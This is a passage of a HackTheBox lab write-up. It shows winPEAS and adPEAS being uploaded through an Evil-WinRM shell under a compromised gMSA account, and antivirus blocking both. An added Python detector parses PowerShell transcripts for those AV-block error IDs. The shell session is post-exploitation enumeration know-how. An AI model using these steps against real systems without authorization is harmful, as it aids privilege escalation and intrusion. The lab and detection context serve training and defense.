PEAS
Conducting automated enumeration after completing the manual enumeration.
It is run under the security context of the adfs_gmsa$ account, as that account has higher privileges than the justin.bradley user.
*Evil-WinRM* PS C:\Users\adfs_gmsa$\Documents> upload winPEASx64.exe .
Info: Uploading /home/kali/archive/htb/labs/ghost/winPEASx64.exe to C:\Users\adfs_gmsa$\Documents\.
Data: 2624852 bytes of 2624852 bytes copied
Info: Upload successful!
Delivery complete
*Evil-WinRM* PS C:\Users\adfs_gmsa$\Documents> .\winPEASx64.exe
Program 'winPEASx64.exe' failed to run: Operation did not complete successfully because the file contains a virus or potentially unwanted softwareAt line:1 char:1
+ .\winPEASx64.exe
+ ~~~~~~~~~~~~~~~~.
At line:1 char:1
+ .\winPEASx64.exe
+ ~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
AV flags winPEASx64.exe and refuses to run it.
adPEAS
*Evil-WinRM* PS C:\Users\adfs_gmsa$\Documents> upload adPEAS.ps1 .
Info: Uploading /home/kali/archive/htb/labs/ghost/adPEAS.ps1 to C:\Users\adfs_gmsa$\Documents\.
Data: 4159704 bytes of 4159704 bytes copied
Info: Upload successful!
Uploaded
*Evil-WinRM* PS C:\Users\adfs_gmsa$\Documents> . .\adPEAS.ps1
At C:\Users\adfs_gmsa$\Documents\adPEAS.ps1:1 char:1
+ Function Invoke-adPEAS {
+ ~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At C:\Users\adfs_gmsa$\Documents\adPEAS.ps1:1 char:1
+ Function Invoke-adPEAS {
+ ~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ParserError: (:) [], ParseException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent
AV flags adPEAS.ps1 as well; the script is blocked at parse time.
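From the defender's side, the two error records above are distinct signals that can be pulled out of PowerShell transcripts or session captures: `NativeCommandFailed` paired with the "contains a virus" message for a blocked binary, and `ScriptContainedMaliciousContent` for a blocked script. The Python below is an added example, not part of the original notes; the function names are illustrative, and the sample is constructed from the output above plus one hypothetical non-AV failure (`missing.exe`).

```python
import re

# Prompt line of a PowerShell session capture: "PS <cwd>> <command>"
PROMPT = re.compile(r"PS (?P<cwd>[A-Za-z]:\\[^>]*)> (?P<cmd>.+)$")
FQEID = re.compile(r"FullyQualifiedErrorId\s*:\s*(\S+)")
VIRUS_MSG = "contains a virus or potentially unwanted software"

def classify(error_id, output):
    """Return which scan blocked the command, or None if it was not an AV block."""
    if error_id == "ScriptContainedMaliciousContent":
        return "script-scan"  # script rejected at parse time
    if error_id == "NativeCommandFailed" and VIRUS_MSG in output:
        return "file-scan"    # process creation refused for a flagged file
    return None               # NativeCommandFailed alone is not AV-specific

def find_av_blocks(transcript):
    """Group output under each prompt line and report AV-blocked commands."""
    blocks = []  # [cwd, command, output lines]
    for line in transcript.splitlines():
        m = PROMPT.search(line)
        if m:
            blocks.append([m["cwd"], m["cmd"].strip(), []])
        elif blocks:
            blocks[-1][2].append(line)
    hits = []
    for cwd, cmd, out in blocks:
        text = "\n".join(out)
        m = FQEID.search(text)
        control = classify(m.group(1), text) if m else None
        if control:
            hits.append({"cwd": cwd, "command": cmd,
                         "error_id": m.group(1), "control": control})
    return hits

# Constructed sample: trimmed page output plus a hypothetical missing.exe
# failure that must NOT be reported as an AV block.
SAMPLE = r"""*Evil-WinRM* PS C:\Users\adfs_gmsa$\Documents> .\winPEASx64.exe
Program 'winPEASx64.exe' failed to run: Operation did not complete successfully because the file contains a virus or potentially unwanted softwareAt line:1 char:1
+ FullyQualifiedErrorId : NativeCommandFailed
*Evil-WinRM* PS C:\Users\adfs_gmsa$\Documents> . .\adPEAS.ps1
This script contains malicious content and has been blocked by your antivirus software.
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent
*Evil-WinRM* PS C:\Users\adfs_gmsa$\Documents> .\missing.exe
Program 'missing.exe' failed to run: The system cannot find the file specified
+ FullyQualifiedErrorId : NativeCommandFailed
"""

if __name__ == "__main__":
    print(*find_av_blocks(SAMPLE), sep="\n")
```

Both hits share a working directory under a service account's profile, which is worth alerting on by itself since a gMSA is not expected to hold an interactive shell.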